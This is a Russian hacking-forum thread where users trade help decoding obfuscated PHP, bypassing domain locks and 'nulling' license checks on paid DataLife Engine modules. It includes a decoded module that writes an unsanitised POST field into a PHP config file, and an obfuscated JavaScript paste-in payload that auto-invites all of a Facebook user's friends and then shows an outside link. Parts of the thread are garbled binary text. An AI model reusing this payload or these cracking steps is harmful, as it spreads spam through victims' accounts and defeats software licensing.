xvo4N0IxR/XcQhnoNreaSwAbWw9wlOTSQhCXdk4O93Zh8718+3s+O+MaH+8N T7dKC1CfztkqMQTZ8fygFHAL7pfHGhZ5PKJncPBjSTdnnNFVdT ysCEUUB5g2GdZsoNgB039jZS6mf+zderSE9Oi5qhkhtuhs5gZz 48xy0+EuU8EMBRaSHPw3qSRlnt5c+KMHo9e76hfb5UXLxAoTKM KOFt+ihTH/TfysN6ftGPuNO0BugZJvuD3uw85QHvXdqtIJRG4UQ2SGAq33kI J2NIWBZ+9U46ndNrq+kP7xF09RZL95/88xB0zkENW4hrIymJ0ijlNoGKvKZwABnv6IsHOuOugPUnknhfw +dBmzl9i9LJNn0fBayt44/CaB56XpY9yabQoaL1boKBWrP+6UxsOTMHlf6IRysIB2QS8N+Xx kRqg68o7U4VdTnE4PcC0k7/HS5noevCZTH3oMNRZSbCJ6o9aWmWa6osz4uUG5znPnb2qqLgzM/wX7Bojq6/FE/+lttMTezhJ5hDuQkWK9IH84NYWDwvSN4sHhfFN/mF1qt8NHhLthwuFLe5JSwrM2Vk6va2rVkBvIHROaTMdPKun+Lf LDNqyq3J90MGhUEArwJX2KPPxQ7RkHWV1H92wpQVR7zqRKBZfu 29IIUIalusZTVyH+GcTeCoF+Zqz4iJwoALAnM8d/JIHJLzPV0mgRB2n8g8a/moqvjegyFfceUtflE5wafu7N3PTRo6HZ6+dgp/pkn3U/hadXZJ+pTn7n9/eLtXYJuZqf2oADcGieIQrv49/NCvrKeMeoR/0+Ox73ySam/KxcSI03uKTfnGj7c78nd4WHanc8/dhB/3x2vGvvmUK2C8sEpUnrEnvTLcE7evh/STkO4rc6S0yupxIuqjhcF7Ha18YLn6bOtnqDd/0JRCOU2mzN1c9pEDmtv900yX7G3wAoRfV83pvD7ojRD+vIRsu3 ehDIK6x8fMArL9/JTbfy+0wqzFYwf/M9Q6WFfgy+kchs3MTVEErI7EqmA0KZWgKi214uKVuULT11frL3 VVC5PPpr9KzdsK1jatH6eJK/LcmBw35a9BFdqsykwPoJPWi6J2pEBat8xQDdDDB4HPY==

запускаем, видим

if(!function_exists('gzuncompress'))die('The PHP zlib module is required to run this script. Please see <A HREF="http://www.php.net/manual/en/ref.zlib.php">http://www.php.net/manual/en/ref.zlib.php</A>');if(((isset($HTTP_SERVER_VARS['SERVER_NAME']))&&(!eregi('((.*\.)?antibit\.ru)',$HTTP_SERVER_VARS['SERVER_NAME'])))||((isset($_SERVER['HTTP_HOST']))&&(!eregi('((.*\.)?antibit\.ru)',$_SERVER['HTTP_HOST']))))die('�� antibit.ru');$OO00O00O0=ereg_replace('__FILE__',"'".$OOO0O0O00."'",gzuncompress(base64_decode(strtr(fread($O000O0O00 ,$OO00O0000),'Z0yx4m1Oa9iIMAwDYez+QLtkXNgE6h8UVsbn BJ5/cuHrPplKoSqWdFf7C2vjG3TR=','ABCDEFGHIJKLMNOPQRSTUV WXYZabcdefghijklmnopqrstuvwxyz0123456789+/'))));fclose($O000O0O00);eval($OO00O00O0);

тут уже 2 варианта, как видно в начале скрипта проверяется HTTP_HOST, если скрипт расположен не на antibit.ru то die; по этому меняем на свой хост и всё =) но естественно лучше закончить начатое, повторяем всё заново, не забывая вместо eval писать echo

Конечный результат:

<?php
/*
================================================== ===
MOD "Files v.3.1" for DataLife Engine - by Snake
url = http://mynokia.su/
email - igramnet@gmail.com
Форум поддержки модуля http://www.fmlife.net/
================================================== ===
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2008 SoftNews Media Group
================================================== ===
Данный код защищен авторскими правами
================================================== ===
Проверен на безопасность командой White Team
-----------------------------------------------------
Сайт команды http://www.white-team.net
================================================== ===
*/
if (! defined ( 'DATALIFEENGINE' ))
die ( "Hacking attempt!" );

if ($_REQUEST ['user_hash'] == "" or $_REQUEST ['user_hash'] != $dle_login_hash)
die ( "Hacking attempt! User not found" );

if (($member_db [1] == 1) or in_array ( $member_db [1], $filesConfig ['access_config_files'] )) {

$accepted_files = trim ( stripslashes ( $_POST ['accepted_files'] ) );
$accepted_files = htmlspecialchars ( $accepted_files, ENT_QUOTES );

$file_copyr = trim ( stripslashes ( $_POST ['file_copyr'] ) );
$file_copyr = htmlspecialchars ( $file_copyr, ENT_QUOTES );

$title_mirror1 = trim ( stripslashes ( $_POST ['title_mirror1'] ) );
$title_mirror1 = htmlspecialchars ( $title_mirror1, ENT_QUOTES );
$title_mirror2 = trim ( stripslashes ( $_POST ['title_mirror2'] ) );
$title_mirror2 = htmlspecialchars ( $title_mirror2, ENT_QUOTES );

$autocat_nodestyle = trim ( stripslashes ( $_POST ['autocat_nodestyle'] ) );
$autocat_nodestyle = htmlspecialchars ( $autocat_nodestyle, ENT_QUOTES );

$cat_exclude = trim ( stripslashes ( $_POST ['cat_exclude'] ) );
$cat_exclude = htmlspecialchars ( $cat_exclude, ENT_QUOTES );

$alpha_stroks = trim ( stripslashes ( $_POST ['alpha_stroks'] ) );
$alpha_stroks = htmlspecialchars ( $alpha_stroks, ENT_QUOTES );
$alpha_word = trim ( stripslashes ( $_POST ['alpha_word'] ) );
$alpha_word = htmlspecialchars ( $alpha_word, ENT_QUOTES );

$site_ka4 = trim ( stripslashes ( $_POST ['site_ka4'] ) );
$site_ka4 = htmlspecialchars ( $site_ka4, ENT_QUOTES );
$site_ka4alka_login = trim ( stripslashes ( $_POST ['site_ka4alka_login'] ) );
$site_ka4alka_login = htmlspecialchars ( $site_ka4alka_login, ENT_QUOTES );
$site_ka4alka_pass = trim ( stripslashes ( $_POST ['site_ka4alka_pass'] ) );
$site_ka4alka_pass = htmlspecialchars ( $site_ka4alka_pass, ENT_QUOTES );
$site_ka4alka_host = trim ( stripslashes ( $_POST ['site_ka4alka_host'] ) );
$site_ka4alka_host = htmlspecialchars ( $site_ka4alka_host, ENT_QUOTES );
$site_ka4alka_path = trim ( stripslashes ( $_POST ['site_ka4alka_path'] ) );
$site_ka4alka_path = htmlspecialchars ( $site_ka4alka_path, ENT_QUOTES );

$access_edit_files = trim ( stripslashes ( $_POST ['access_edit_files'] ) );
$access_edit_files = htmlspecialchars ( $access_edit_files, ENT_QUOTES );
$access_delete_files = trim ( stripslashes ( $_POST ['access_delete_files'] ) );
$access_delete_files = htmlspecialchars ( $access_delete_files, ENT_QUOTES );
$access_config_files = trim ( stripslashes ( $_POST ['access_config_files'] ) );
$access_config_files = htmlspecialchars ( $access_config_files, ENT_QUOTES );
$access_edit_cats = trim ( stripslashes ( $_POST ['access_edit_cats'] ) );
$access_edit_cats = htmlspecialchars ( $access_edit_cats, ENT_QUOTES );
$access_view_logs = trim ( stripslashes ( $_POST ['access_view_logs'] ) );
$access_view_logs = htmlspecialchars ( $access_view_logs, ENT_QUOTES );

$access_platform_edit = trim ( stripslashes ( $_POST ['access_platform_edit'] ) );
$access_platform_edit = htmlspecialchars ( $access_platform_edit, ENT_QUOTES );
$access_version_edit = trim ( stripslashes ( $_POST ['access_version_edit'] ) );
$access_version_edit = htmlspecialchars ( $access_version_edit, ENT_QUOTES );
$access_broken_edit = trim ( stripslashes ( $_POST ['access_broken_edit'] ) );
$access_broken_edit = htmlspecialchars ( $access_broken_edit, ENT_QUOTES );
$access_addfile_host = trim ( stripslashes ( $_POST ['access_addfile_host'] ) );
$access_addfile_host = htmlspecialchars ( $access_addfile_host, ENT_QUOTES );

$content = "<?PHP\n\n";
$content .= "\$filesConfig['nfmain'] = " . intval ( $_POST ['nfmain'] ) . ";\n\n";
$content .= "\$filesConfig['fcat'] = " . intval ( $_POST ['fcat'] ) . ";\n\n";
$content .= "\$filesConfig['maxsize'] = " . intval ( $_POST ['maxsize'] * 1024 ) . ";\n\n";
$content .= "\$filesConfig['accepted_files'] = \"" . $accepted_files . "\";\n\n";
$content .= "\$filesConfig['file_copyr'] = \"" . $file_copyr . "\";\n\n";
$content .= "\$filesConfig['title_mirror1'] = \"" . $title_mirror1 . "\";\n\n";
$content .= "\$filesConfig['title_mirror2'] = \"" . $title_mirror2 . "\";\n\n";
$content .= "\$filesConfig['numfiles'] = " . intval ( $_POST ['numfiles'] ) . ";\n\n";
$content .= "\$filesConfig['allowed_guest_com'] = " . intval ( $_POST ['allowed_guest_com'] ) . ";\n\n";
$content .= "\$filesConfig['show_sub_files'] = " . intval ( $_POST ['show_sub_files'] ) . ";\n\n";
$content .= "\$filesConfig['show_files_sub_cat'] = " . intval ( $_POST ['show_files_sub_cat'] ) . ";\n\n";
$content .= "\$filesConfig['allow_comments'] = " . intval ( $_POST ['allow_comments'] ) . ";\n\n";
$content .= "\$filesConfig['hide_url'] = " . intval ( $_POST ['hide_url'] ) . ";\n\n";
$content .= "\$filesConfig['nica_rewrite'] = " . intval ( $_POST ['nica_rewrite'] ) . ";\n\n";
$content .= "\$filesConfig['auto_category'] = " . intval ( $_POST ['auto_category'] ) . ";\n\n";
$content .= "\$filesConfig['down_guest'] = " . intval ( $_POST ['down_guest'] ) . ";\n\n";
$content .= "\$filesConfig['fcount'] = " . intval ( $_POST ['fcount'] ) . ";\n\n";
$content .= "\$filesConfig['widththumb'] = " . intval ( $_POST ['widththumb'] ) . ";\n\n";
$content .= "\$filesConfig['maxsize_thumb'] = " . intval ( $_POST ['maxsize_thumb'] * 1024 ) . ";\n\n";
$content .= "\$filesConfig['allow_zipfiles'] = " . intval ( $_POST ['allow_zipfiles'] ) . ";\n\n";
$content .= "\$filesConfig['allow_watermark'] = " . intval ( $_POST ['allow_watermark'] ) . ";\n\n";
$content .= "\$filesConfig['max_watermark'] = " . intval ( $_POST ['max_watermark'] ) . ";\n\n";
$content .= "\$filesConfig['allow_screenshot'] = " . intval ( $_POST ['allow_screenshot'] ) . ";\n\n";
$content .= "\$filesConfig['allow_screen_admin'] = " . intval ( $_POST ['allow_screen_admin'] ) . ";\n\n";
$content .= "\$filesConfig['default_screenshot'] = " . intval ( $_POST ['default_screenshot'] ) . ";\n\n";
$content .= "\$filesConfig['numbertopfiles'] = " . intval ( $_POST ['numbertopfiles'] ) . ";\n\n";
$content .= "\$filesConfig['numbernewfiles'] = " . intval ( $_POST ['numbernewfiles'] ) . ";\n\n";
$content .= "\$filesConfig['mail_comments'] = " . intval ( $_POST ['mail_comments'] ) . ";\n\n";
$content .= "\$filesConfig['allow_filestoemail'] = " . intval ( $_POST ['allow_filestoemail'] ) . ";\n\n";
$content .= "\$filesConfig['allow_addfile_url'] = " . intval ( $_POST ['allow_addfile_url'] ) . ";\n\n";
$content .= "\$filesConfig['alpha'] = " . intval ( $_POST ['alpha'] ) . ";\n\n";
$content .= "\$filesConfig['alpha_stroks'] = \"" . $alpha_stroks . "\";\n\n";
$content .= "\$filesConfig['alpha_word'] = \"" . $alpha_word . "\";\n\n";
$content .= "\$filesConfig['show_file_main'] = " . intval ( $_POST ['show_file_main'] ) . ";\n\n";
$content .= "\$filesConfig['show_alpha_cat'] = " . intval ( $_POST ['show_alpha_cat'] ) . ";\n\n";
$content .= "\$filesConfig['show_main_cat'] = " . intval ( $_POST ['show_main_cat'] ) . ";\n\n";
$content .= "\$filesConfig['rss_count'] = " . intval ( $_POST ['rss_count'] ) . ";\n\n";

$content .= "\$filesConfig['view'] = " . $_POST ['view'] . ";\n\n";
$content .= "\$filesConfig['thumbs_files'] = " . intval ( $_POST ['thumbs_files'] ) . ";\n\n";

$content .= "\$filesConfig['autocat_cols'] = " . intval ( $_POST ['autocat_cols'] ) . ";\n\n";
$content .= "\$filesConfig['autocat_per_row'] = " . intval ( $_POST ['autocat_per_row'] ) . ";\n\n";
$content .= "\$filesConfig['autocat_nodestyle'] = \"" . $autocat_nodestyle . "\";\n\n";
$content .= "\$filesConfig['cat_exclude'] = \"" . $cat_exclude . "\";\n\n";
$content .= "\$filesConfig['access_edit_files'] = \"" . $access_edit_files . "\";\n\n";
$content .= "\$filesConfig['access_delete_files'] = \"" . $access_delete_files . "\";\n\n";
$content .= "\$filesConfig['access_config_files'] = \"" . $access_config_files . "\";\n\n";
$content .= "\$filesConfig['access_edit_cats'] = \"" . $access_edit_cats . "\";\n\n";
$content .= "\$filesConfig['access_view_logs'] = \"" . $access_view_logs . "\";\n\n";
$content .= "\$filesConfig['access_platform_edit'] = \"" . $access_platform_edit . "\";\n\n";
$content .= "\$filesConfig['access_version_edit'] = \"" . $access_version_edit . "\";\n\n";
$content .= "\$filesConfig['access_broken_edit'] = \"" . $access_broken_edit . "\";\n\n";
$content .= "\$filesConfig['access_addfile_host'] = \"" . $access_addfile_host . "\";\n\n";

$content .= "\$filesConfig['allow_show_keywords'] = \"" . $allow_show_keywords . "\";\n\n";

$content .= "\$site_ka4 = \"" . $site_ka4 . "\";\n\n";
$content .= "\$site_ka4alka_login = \"" . $site_ka4alka_login . "\";\n\n";
$content .= "\$site_ka4alka_pass = \"" . $site_ka4alka_pass . "\";\n\n";
$content .= "\$site_ka4alka_host = \"" . $site_ka4alka_host . "\";\n\n";
$content .= "\$site_ka4alka_path = \"" . $site_ka4alka_path . "\";\n\n";

$content .= "?>";

$filename = "./engine/data/" . $modulname . "_config.php";
if ($file = fopen ( $filename, "w" )) {
fwrite ( $file, $content );
fclose ( $file );
} else {
echo "Не удалось записать файл. Выставьте права достпупа на файл " . $modulname . "_config.php 0666";
exit ();
}

WriteLog ( $modul_dbtitle, $modulname, "Изменена кофигурация архива файлов" );

header ( "Location: " . $config ['http_home_url'] . "" . $config ['admin_path'] . "?mod=admin_" . $modulname . "&action=conf" );

} else {
msg ( "error", $lang ['addnews_denied'], $lang ['db_denied'] );
}
?>

ex3me

27.04.2010, 15:40

Dragon_X

29.04.2010, 09:57

Даже не представляю как с этим бороться )
Может кто алгоритм подскажет расшифровки (base64_decode для каждого кусочка можно задолбаться юзать)

add: в тегах CODE и PHP содержимое не отображается, посему выложу ссылку:

http://floomby.ru/content/AdvDuZPHtk/

red mine похоже? :))

массивы - вывод в цикле
сам код: берёшь код в кавычки, экранируешь кавычки в коде и через str_replace в цикле меняешь функцию за функцию
там правда бутут небольшие проблемы но решаются правкой

sevenup

01.05.2010, 03:00

Помогите расшифровать скрипт:

class ProjectConfig
{

public static function setup( )
{
self::startsession( );
self::registerautoload( );
self::loadconstants( );
self::initlog( );
self::initerrorhandlers( );
}

public static function initLog( )
{
MotoLog::getinstance( )->addWriter( MOTO_ADMIN_DIR."/logs/moto.log" );
( new Zend_Log_Writer_Stream( ) );
}

public static function registerAutoload( )
{
require_once( "Zend/Loader.php" );
Zend_Loader::registerautoload( );
}

public static function initErrorHandlers( )
{
_obfuscate_bShjLzcWFHZ5H2ZgAQ08( E_ALL );
_obfuscate_bQ90cSo1Zg( "display_errors", "off" );
_obfuscate_bQ90cSo1Zg( "log_errors", "on" );
_obfuscate_bQ90cSo1Zg( "error_log", MOTO_ADMIN_DIR."/logs/php_error.log" );
MotoError::registerhandlers( );
}

public static function startSession( )
{
_obfuscate_YG5zFlwpaDQccyt4( "flashmoto" );
_obfuscate_bQ90cSo1Zg( "session.cookie_path", _obfuscate_aAFqNWoGfQ87Pjg( "//", "/", MOTO_ROOT_URL."/" ) );
_obfuscate_am8HDRBmLA1iC2ZgCw( );
}

public static function loadConstants( )
{
$_obfuscate_KTSWDGoJ4CE8IU = array(
array(
"file_path" => MOTO_ROOT_DIR."/config.xml",
"value_prefix" => MOTO_ADMIN_DIR."/../"
),
array(
"file_path" => MOTO_ADMIN_DIR."/config.xml",
"value_prefix" => ""
)
);
foreach ( $_obfuscate_KTSWDGoJ4CE8IU as $_obfuscate_QSpsVAzJ )
{
( );
$_obfuscate_uffh = new DomDocument( );
$_obfuscate_uffh->load( $_obfuscate_QSpsVAzJ['file_path'] );
$_obfuscate_ = $_obfuscate_uffh->getElementsByTagName( "item" );
foreach ( $_obfuscate_ as $_obfuscate_LQ8UKg )
{
$_obfuscate_rSD9vcr3kKM = $_obfuscate_LQ8UKg->getAttribute( "name" );
if ( 0 < _obfuscate_IHNwNyJo( $_obfuscate_rSD9vcr3kKM ) )
{
if ( _obfuscate_c2ssCnw1( $_obfuscate_rSD9vcr3kKM, -5 ) == "_PATH" )
{
_obfuscate_CSBmAn9z( $_obfuscate_rSD9vcr3kKM, $_obfuscate_QSpsVAzJ['value_prefix'].$_obfuscate_LQ8UKg->nodeValue );
}
else
{
_obfuscate_CSBmAn9z( $_obfuscate_rSD9vcr3kKM, $_obfuscate_LQ8UKg->nodeValue );
}
}
}
}
}

}

_obfuscate_CSBmAn9z( "MOTO_ROOT_DIR", _obfuscate_aAFqNWoGfQ87Pjg( "\\", "/", _obfuscate_Axlsd2lxED0( _obfuscate_KgYfAW00aQ( __FILE__ )."/../.." ) ) );
_obfuscate_CSBmAn9z( "MOTO_ADMIN_DIR", _obfuscate_aAFqNWoGfQ87Pjg( "\\", "/", _obfuscate_Axlsd2lxED0( _obfuscate_KgYfAW00aQ( __FILE__ )."/.." ) ) );
$relative_path = !empty( $_SERVER['SCRIPT_NAME'] ) ? $_SERVER['SCRIPT_NAME'] : _obfuscate_ElwMa2Z3( "SCRIPT_NAME" );
$absolute_path = _obfuscate_aAFqNWoGfQ87Pjg( "\\", "/", _obfuscate_Axlsd2lxED0( _obfuscate_LHloL2gtCQs( $relative_path ) ) );
$doc_root = _obfuscate_c2ssCnw1( $absolute_path, 0, _obfuscate_GBcde1sU( $absolute_path, $relative_path ) );
_obfuscate_CSBmAn9z( "MOTO_DOCUMENT_ROOT", $doc_root );
_obfuscate_CSBmAn9z( "MOTO_ROOT_URL", "/"._obfuscate_c2ssCnw1( MOTO_ROOT_DIR, _obfuscate_GBcde1sU( MOTO_ROOT_DIR, $doc_root ) + _obfuscate_IHNwNyJo( $doc_root ) + 1 ) );
_obfuscate_CSBmAn9z( "MOTO_ADMIN_URL", "/"._obfuscate_c2ssCnw1( MOTO_ADMIN_DIR, _obfuscate_GBcde1sU( MOTO_ADMIN_DIR, $doc_root ) + _obfuscate_IHNwNyJo( $doc_root ) + 1 ) );
_obfuscate_cBFtIW0FXGwYDR5vXSwOfw( ".".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/services/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/services/vo/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/sfTemplating/".PATH_SEPARATOR._obfuscate_MGthcT5gYyVtbWYtdWYnMw( ) );
unset( $relative_path );
unset( $absolute_path );
unset( $doc_root );
?>

Shadow_p1raT

02.05.2010, 12:00

Помогите пожалуйста, нужно срочно расшифровать сорцы вот этого чуда - http://cramac.ru/vdb/vdb.zip

Явно зашифрован зендом, но чем не пробывал расшифровывать - результата нету...

Gifts

02.05.2010, 12:18

Shadow_p1raT Скажите честно, даже не пытались? http://ifolder.ru/17544498

Rew http://ifolder.ru/17544554

Rew

02.05.2010, 18:31

Прошу сделайте кто-нибудь, рабочий null для модуля для dle S-Blocks v1.7 by Sander
очень рульный модуль.

Я и сам хотел его занулить но там все файлы php зашифрованы.

sblocks.php

Cнk™Xш¦$х±tі™Тж,"є$2cи®EЕAW,Аъу¬8hцхЅЕв`XЄ—‰8ш ж-‰4x®5ъцТвИї?ШХгKЉ*ћ‰џоюХ І›Є»U±Ъјdа7б·Uг/8·l’ dЛоБкщ
нМ?ґм^ёпA<5)“-аЏ/±Ґ!Nв6ъД©6ж©!јFs7*‚ҐҐ/%?XѕА–L}KЂGБbчR\°”’TXNyBR’?”$2&I¶Ёв%1bН
эNGRзмЏ2@ъdБlЈ§iќODъ“ЎSOЂяFу4t� �‘@)ЙlЩJШеIѕQi3b5EЉEµSaьй˜ХТІ•? vзк
п•CEК‘2%IЂ№-мсp°&•њяЧd$‡рXµф†[Ќ«їС?'R®ќj}Cn a’/fµѕЎ¦’

все те нулы которые на него есть не работают.

Прикол ещё в том что он не просит лецензию на локал хосте кажется какбуто всё работает как только паставил на сервер то он работать отказывается

Может кто возьмётся вот модуль http://slil.ru/29068068.

Или помогите расшифровать sblocks.php

Я так понял php файлы закриптованы Zend Encoder или Zend SafeGuard Suite может где есть инкриптор или распаковщик для php.

На всякий случай отпишу DeZender 5 вроде берёт Zend SafeGuard Suite

Rew

02.05.2010, 19:10

Rew http://ifolder.ru/17544554

Gifts

Вау!!! Спасибо Gifts я ваше сообщение сразу и не увидел сща потестю если что с меня +10.

Не получилось за ломать у мня но всё ровно спасибо +4.

Пишет ошибку не знаю как убрать
Parse error: syntax error, unexpected '[', expecting ',' or ';' in Z:\home\loca\www\engine\inc\sblocks.php on line 63

Убрал терь модуль в админки пашет после раскриптовки.

Теперь он валиться на старке

Parse error: syntax error, unexpected T_DO, expecting ';' in Z:\home\loca\www\engine\modules\sblocks.php on line 958

На таком вот месте

$j = 1;
for ( ; do
{
$j <= $enpages_count; ++$j )

Подскажите что нужно сделать

Shadow_p1raT

03.05.2010, 07:28

Gift, спасибо большое!
Пытался всеми средствами из этой темы
https://forum.antichat.ru/threadnav69285-3-10.html

Dragon_X

04.05.2010, 06:44

Помогите расшифровать скрипт:

Держи, работать будет
На будющее: Сбрасывать надо в исходном виде и в расшифрованном - ибо при выкладывании тут спецсимволы потерлись

class ProjectConfig
{

public static function setup()
{
self::startsession();
self::registerautoload();
self::loadconstants();
self::initlog();
self::initerrorhandlers();
}

public static function initLog()
{
MotoLog::getinstance()->addWriter(MOTO_ADMIN_DIR."/logs/moto.log");
(new Zend_Log_Writer_Stream());
}

public static function registerAutoload()
{
require_once("Zend/Loader.php");
Zend_Loader::registerautoload();
}

public static function initErrorHandlers()
{
error_reporting(E_ALL);
ini_set("display_errors", "off");
ini_set("log_errors", "on");
ini_set("error_log", MOTO_ADMIN_DIR."/logs/php_error.log");
MotoError::registerhandlers();
}

public static function startSession()
{
session_name("flashmoto");
ini_set("session.cookie_path", str_replace("//", "/", MOTO_ROOT_URL."/"));
session_start();
}

public static function loadConstants()
{
$const_array = array(
array(
"file_path" => MOTO_ROOT_DIR."/config.xml",
"value_prefix" => MOTO_ADMIN_DIR."/../"
),
array(
"file_path" => MOTO_ADMIN_DIR."/config.xml",
"value_prefix" => ""
)
);
foreach ($const_array as $const_one)
{
$conf_file = new DomDocument();
$conf_file->load($const_one['file_path']);
$items = $conf_file->getElementsByTagName("item");
foreach ($items as $item)
{
$item_name = $item->getAttribute("name");
if (0 < strlen($item_name))
{
if (substr($item_name, -5) == "_PATH")
{
define($item_name, $const_one['value_prefix'].$item->nodeValue);
}
else
{
define($item_name, $item->nodeValue);
}
}
}
}
}

}

define("MOTO_ROOT_DIR", str_replace("\\", "/", realpath(dirname(__FILE__)."/../..")));
define("MOTO_ADMIN_DIR", str_replace("\\", "/", realpath(dirname(__FILE__)."/..")));
$relative_path = !empty($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : getenv("SCRIPT_NAME");
$absolute_path = str_replace("\\", "/", realpath(basename($relative_path)));
$doc_root = substr($absolute_path, 0, strpos($absolute_path, $relative_path));

define("MOTO_DOCUMENT_ROOT", $doc_root);
define("MOTO_ROOT_URL", "/".substr(MOTO_ROOT_DIR, strpos(MOTO_ROOT_DIR, $doc_root) + strlen($doc_root) + 1));
define("MOTO_ADMIN_URL", "/".substr(MOTO_ADMIN_DIR, strpos(MOTO_ADMIN_DIR, $doc_root) + strlen($doc_root) + 1));

set_include_path(".".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/service

s/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/Moto/services/vo/".PATH_SEPARATOR.MOTO_ADMIN_DIR."/libs/sfTemplating/".PATH_SEPARATOR.get_include_path());
unset($relative_path);
unset($absolute_path);
unset($doc_root);
?>

Myxa

06.05.2010, 14:59

Кому не сложно, помогите пожалуйста расшифровать следующий код:

http://slil.ru/29090854

Дмитрий

06.05.2010, 15:11

?>
<div class="clearfix"></div>

<?php global $is_home; ?>

<?php if ( $is_home ) { ?>

<div class="container_12 footwidgets-spot">

<?php if ( function_exists('dynamic_sidebar') && (is_sidebar_active(3) || is_sidebar_active(4) || is_sidebar_active(5)) ) { // Don't show on the front page ?>



<div id="footwidgets-front">

<div class="widget-spot grid_4">

<?php dynamic_sidebar(3); ?>

</div>

<div class="widget-spot grid_4">

<?php dynamic_sidebar(4); ?>

</div>

<div class="widget-spot grid_4">

<?php dynamic_sidebar(5); ?>

</div>

</div>



<?php } ?>

</div>

<?php } ?>

<div class="container_12">



<div id="footer" >

<div class="copyright">

<div class="fl">© <?php the_time('Y'); ?> <?php bloginfo(); ?> <br/> supported by <a href="http://www.magentohostingz.com/magento/requirements/" title="Magento Requirements"><strong>Magento Hosting Requirements</strong></a> Created for <a href="" title=""><strong>Wordpress.org</strong></a> </div>

<div class="fr">

<?php if ( get_option('bizzthemes_footpages') <> "" ) { ?>

<?php wp_list_pages('title_li=&depth=0&include=' . get_option('bizzthemes_footpages') .'&sort_column=menu_order'); ?>

<?php } ?>

</div>

<div class="clearfix"></div>

</div>

</div>



<?php wp_footer(); ?>

<?php if ( get_option('bizzthemes_google_analytics') <> "" ) { echo stripslashes(get_option('bizzthemes_google_analyti cs')); } ?>

</div>

</body>

</html>
<?

rosalin

08.05.2010, 06:48

если не сложно пожалуйста раскодируйте , или хотябы определите какой Obfuscator
http://slil.ru/29099856

seofilms

12.05.2010, 13:10

заранее спасибо за помощь

Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x 38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38 \x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x 49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x 73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20 \x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x 61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61 \x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x 61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73 \x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x 26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D \x31\x32\x35\x30\x35\x33\x37\x32\x34\x31\x37\x33\x 35\x38\x34\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20 \x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x 6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F \x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x 6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67 \x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x 6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x 74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x 6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x 5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65 \x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);var c=document[a[6]](a[5]);c[a[8]](a[7],true,true); void (ss[a[9]](c)); void (setTimeout(function (){fs[a[10]]();} ,4000)); void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000)); void (setTimeout(function (){document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x 70\x3A\x2F\x2F\x77\x77\x77\x2E\x6B\x69\x6E\x67\x63 \x6F\x72\x70\x73\x2E\x63\x6F\x6D\x2F\x30\x37\x31\x 2F\x62\x69\x67\x67\x65\x73\x74\x2D\x66\x61\x69\x6C \x2F\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x 21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C \x2F\x61\x3E";} ,5400));

krypt3r

12.05.2010, 13:42

Flenat

19.05.2010, 18:22

Помогите, у самого некак не выходит.

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
